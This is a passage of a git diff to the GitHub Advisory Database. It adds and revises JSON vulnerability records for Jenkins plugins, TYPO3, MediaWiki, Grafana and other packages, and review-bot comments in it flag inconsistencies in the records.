diff --git a/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json b/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json
index d06ebaeb6830d..53007e4c5fec6 100644
--- a/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json
+++ b/advisories/github-reviewed/2022/05/GHSA-c4r2-3f9r-rwp8/GHSA-c4r2-3f9r-rwp8.json
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8113"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8113.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json b/advisories/github-reviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json
new file mode 100644
index 0000000000000..1d484289a307e
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json
@@ -0,0 +1,131 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c73w-4rcj-2622", + "modified": "2024-02-08T21:58:48Z", + "published": "2022-05-02T03:47:10Z", + "aliases": [ + "CVE-2009-3636" + ], + "summary": "Typo3 API Install Tool vulnerable to Cross-site Scripting", + "details": "Cross-site scripting (XSS) vulnerability in the Install Tool subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3636" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53929" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": 
"http://marc.info/?l=oss-security&m=125633199111438&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:58:48Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json b/advisories/github-reviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json new file mode 100644 index 0000000000000..23932510f9407 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8qr-vfjf-62q3", + "modified": "2024-01-30T22:29:21Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2654" + ], + "summary": "Emails were sent to addresses not associated with actual users of Jenkins by Email Extension Plugin", + "details": "jenkins-email-ext before version 2.57.1 is vulnerable to an Information Exposure. The Email Extension Plugins is able to send emails to a dynamically created list of users based on the changelogs, like authors of SCM changes since the last successful build. This could in some cases result in emails being sent to people who have no user account in Jenkins, and in rare cases even people who were not involved in whatever project was being built, due to some mapping based on the local-part of email addresses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:email-ext" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.57.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2654" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2654" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:29:21Z", + "nvd_published_at": "2018-08-06T22:29:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json b/advisories/github-reviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json similarity index 77% rename from advisories/unreviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json rename to advisories/github-reviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json index 8571269c5832a..f08c3eef915ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json +++ b/advisories/github-reviewed/2022/05/GHSA-c8wv-qwwc-6j73/GHSA-c8wv-qwwc-6j73.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-c8wv-qwwc-6j73", - "modified": "2023-05-22T00:30:18Z", + "modified": "2024-02-01T21:50:08Z", "published": "2022-05-24T19:17:14Z", "aliases": [ "CVE-2021-41800" ], + "summary": "MediaWiki allows a denial of service", "details": "MediaWiki before 1.36.2 allows a denial of service (resource consumption because of lengthy query processing time). Visiting Special:Contributions can sometimes result in a long running SQL query because PoolCounter protection is mishandled.", "severity": [ { @@ -14,7 +15,25 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Packagist", + "name": "mediawiki/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.36.2" + } + ] + } + ] + } ], "references": [ { @@ -54,9 +73,9 @@ "cwe_ids": [ "CWE-770" ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:50:08Z", "nvd_published_at": "2021-10-11T08:15:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json b/advisories/github-reviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json new file mode 100644 index 0000000000000..742b82bdcc5fd --- /dev/null 
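Review bot: The last hunk of GHSA-c8wv-qwwc-6j73 lowers `severity` in `database_specific` from `HIGH` to `MODERATE`, but the CVSS vector inside the top-level `severity` array is not touched by this diff (it sits in the context skipped between the first and second hunks), so the label may now disagree with the score it is meant to summarise. Either re-score the vector in the same change or keep the label at `HIGH` until that is done. If the downgrade is a deliberate editorial rescoring, saying so in the commit description would save the next reader the same check.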
+++ b/advisories/github-reviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c9px-7j36-f35v", + "modified": "2024-01-30T22:42:51Z", + "published": "2022-05-13T01:48:34Z", + "aliases": [ + "CVE-2018-1000189" + ], + "summary": "CSRF vulnerability and missing permission checks in Jenkins AbsInt Astrée Plugin", + "details": "A command execution vulnerability exists in Jenkins Absint Astree Plugin 1.0.5 and older in AstreeBuilder.java that allows attackers with Overall/Read access to execute a command on the Jenkins master.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:absint-astree" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000189" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-807" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:42:51Z", + "nvd_published_at": "2018-06-05T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json b/advisories/github-reviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json new file mode 100644 index 0000000000000..0e892e0431afc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json 
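Review bot: The `summary` and `details` of GHSA-c9px-7j36-f35v describe different weaknesses — the summary says CSRF and missing permission checks, the details say command execution on the Jenkins master by users with Overall/Read — and `cwe_ids` is left as an empty array, so nothing in the record resolves the contradiction. Whichever text the single reference `#SECURITY-807` supports should be used for both fields, and a CWE filled in to match (the sibling Jenkins advisories in this commit use `CWE-352` and `CWE-862` for the CSRF/missing-permission reading; the command-execution reading would call for `CWE-78`). The `PR:L` in the CVSS vector is consistent with either reading and does not settle it — confirm against the referenced advisory before the `github_reviewed: true` stamp is kept.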
@@ -0,0 +1,89 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccmg-w4xm-p28v", + "modified": "2024-02-01T21:46:05Z", + "published": "2022-05-24T17:16:26Z", + "aliases": [ + "CVE-2020-12245" + ], + "summary": "Grafana XSS in header column rename", + "details": "Grafana before 6.7.3 allows table-panel XSS via column.title or cellLinkTooltip.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.7.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12245" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/23816" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/0284747c88eb9435899006d26ffaf65f89dec88e" + }, + { + "type": "WEB", + "url": "https://community.grafana.com/t/release-notes-v6-7-x/27119" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#673-2020-04-23" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200511-0001/" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00083.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00009.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00017.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:05Z", + "nvd_published_at": "2020-04-24T21:15:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json b/advisories/github-reviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json new file mode 100644 index 0000000000000..c96cb2d155ace --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgr9-h9qq-x9fx", + "modified": "2024-02-07T22:30:03Z", + "published": "2022-05-02T06:18:14Z", + "aliases": [ + "CVE-2010-1022" + ], + "summary": "TYPO3 Authentication Bypass via Salted user password hashes extension", + "details": "The TYPO3 Security - Salted user password hashes (t3sec_saltedpw) extension before 0.2.13 for TYPO3 allows remote attackers to bypass authentication via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-saltedpasswords" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1022" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/saltedpasswords" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101125125343/http://secunia.com/advisories/38992" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228221050/http://www.securityfocus.com/bid/38799" + }, + { + "type": "WEB", + "url": "http://typo3.org/extensions/repository/view/t3sec_saltedpw/0.2.13/" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:30:03Z", + "nvd_published_at": "2010-03-19T19:00:00Z" + } +} \ No newline at end of file 
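Review bot: The `affected` entry of GHSA-cgr9-h9qq-x9fx maps the advisory to `typo3/cms-saltedpasswords` with range `introduced 0` / `fixed 0.2.13`, while `details` and the references (`typo3.org/extensions/repository/view/t3sec_saltedpw/0.2.13/`) attribute the flaw to the third-party `t3sec_saltedpw` extension; the package named here is the core system extension at github.com/TYPO3-CMS/saltedpasswords, whose Packagist versions presumably track TYPO3 core releases rather than a 0.2.x line. If so, the range can never match an installed version, so the advisory is inert for Packagist consumers while the extension that was actually vulnerable is not covered at all. Confirm the package mapping against the TYPO3-SA-2010-006 bulletin before this file is kept as reviewed.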
diff --git a/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json b/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json index 7d8e661b7cf38..dad13962fdb22 100644 --- a/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json +++ b/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json @@ -27,6 +27,25 @@ { "introduced": "0" }, + { + "fixed": "4.3.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "shopware/shopware" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, { "fixed": "5.1.5" } @@ -44,6 +63,14 @@ "type": "WEB", "url": "https://github.com/shopware/shopware/commit/d73e9031a5b2ab6e918eb86d1e2b2e873cd3558d" }, + { + "type": "WEB", + "url": "https://community.shopware.com/_detail_1918.html" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/shopware/shopware/CVE-2016-3109.yaml" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200814090044/http://www.securityfocus.com/archive/1/538173/100/0/threaded" diff --git a/advisories/github-reviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json b/advisories/github-reviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json new file mode 100644 index 0000000000000..2991ab71eafdb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq9m-rpm5-27m9", + "modified": "2024-01-30T21:53:52Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003095" + ], + "summary": "Jenkins Perfecto Mobile Plugin stores credentials in plain text", + "details": "Jenkins Perfecto Mobile Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:perfectomobile" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.62.0.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003095" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1061" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:53:52Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json b/advisories/github-reviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json new file mode 100644 index 0000000000000..d132fb2aaad03 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cqp7-hwm3-cfg7", + "modified": "2024-01-30T22:27:57Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003023" + ], + "summary": "XSS vulnerability in Jenkins Warnings Next Generation Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins Warnings Next Generation Plugin 1.0.1 and earlier in src/main/java/io/jenkins/plugins/analysis/core/model/DetailsTableModel.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourceDetail.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourcePrinter.java, src/main/java/io/jenkins/plugins/analysis/core/util/Sanitizer.java, src/main/java/io/jenkins/plugins/analysis/warnings/DuplicateCodeScanner.java that allows attackers with the ability to control warnings parser input to have Jenkins render arbitrary HTML.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:warnings-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003023" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1271" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:27:57Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json b/advisories/github-reviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json new file mode 100644 index 0000000000000..feb3f8b4cf574 --- /dev/null 
+++ b/advisories/github-reviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crvq-mw2w-4cfx", + "modified": "2024-01-30T22:42:35Z", + "published": "2022-05-13T01:48:34Z", + "aliases": [ + "CVE-2018-1000197" + ], + "summary": "Jenkins Black Duck Hub Plugin allowed any user with Overall/Read to read and write its configuration", + "details": "An improper authorization vulnerability exists in Jenkins Black Duck Hub Plugin 3.0.3 and older in PostBuildScanDescriptor.java that allows users with Overall/Read permission to read and write the Black Duck Hub plugin configuration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.blackducksoftware.integration:blackduck-hub" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000197" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:42:35Z", + "nvd_published_at": "2018-06-05T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json b/advisories/github-reviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json new file mode 100644 index 0000000000000..0ef01cd509abd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvh8-9j4x-5v4j", + "modified": "2024-01-30T22:04:02Z", + "published": "2022-05-13T01:18:46Z", + "aliases": [ + "CVE-2018-1000424" + ], + "summary": "Jenkins Artifactory Plugin stored old directly entered credentials unencrypted on disk ", + "details": "An insufficiently protected credentials vulnerability exists in Jenkins Artifactory Plugin 2.16.1 and earlier in ArtifactoryBuilder.java, CredentialsConfig.java that allows attackers with local file system access to obtain old credentials configured for the plugin before it integrated with Credentials Plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:artifactory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.16.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000424" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-265" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:04:02Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json b/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json index 25925fd8b0641..2ebb6482ab6d1 100644 --- a/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json +++ b/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json 
@@ -71,6 +71,10 @@
 "type": "WEB",
 "url": "https://github.com/guzzle/guzzle/commit/74a8602c6faec9ef74b7a9391ac82c5e65b1cdab"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/guzzle/CVE-2022-29248.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/guzzle/guzzle"
diff --git a/advisories/github-reviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json b/advisories/github-reviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json
new file mode 100644
index 0000000000000..5bdaec9bac2ac
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwxx-gwwj-pqjq", + "modified": "2024-01-30T22:43:17Z", + "published": "2022-05-13T01:48:33Z", + "aliases": [ + "CVE-2018-1000145" + ], + "summary": "Jenkins Perforce Plugin uses ineffective credentials encryption", + "details": "An exposure of sensitive information vulnerability exists in Jenkins Perforce Plugin version 1.3.36 and older in PerforcePasswordEncryptor.java that allows attackers with local file system access to obtain encrypted Perforce passwords and decrypt them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:perforce" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.3.36" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000145" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/perforce-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-373" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:43:17Z", + "nvd_published_at": "2018-04-05T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json b/advisories/github-reviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json new file mode 100644 index 0000000000000..0c71e46340ae5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json 
@@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f68m-q26r-64f6", + "modified": "2024-02-08T15:31:52Z", + "published": "2022-05-17T05:26:20Z", + "aliases": [ + "CVE-2010-5142" + ], + "summary": "Chef Improper Access Control vulnerability", + "details": "`chef-server-api/app/controllers/users.rb` in the API in Chef before 0.9.0 does not require administrative privileges for the create, destroy, and update methods, which allows remote authenticated users to manage user accounts via requests to the /users URI.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "chef" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5142" + }, + { + "type": "WEB", + "url": "https://github.com/opscode/chef/commit/c3bb41f727fbe00e5de719d687757b24c8dcdfc8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/chef/chef" + }, + { + "type": "WEB", + "url": "http://tickets.opscode.com/browse/CHEF-1289" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:31:52Z", + "nvd_published_at": "2012-08-08T10:26:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json b/advisories/github-reviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json new file mode 100644 index 0000000000000..49f72b53e873a --- /dev/null +++ 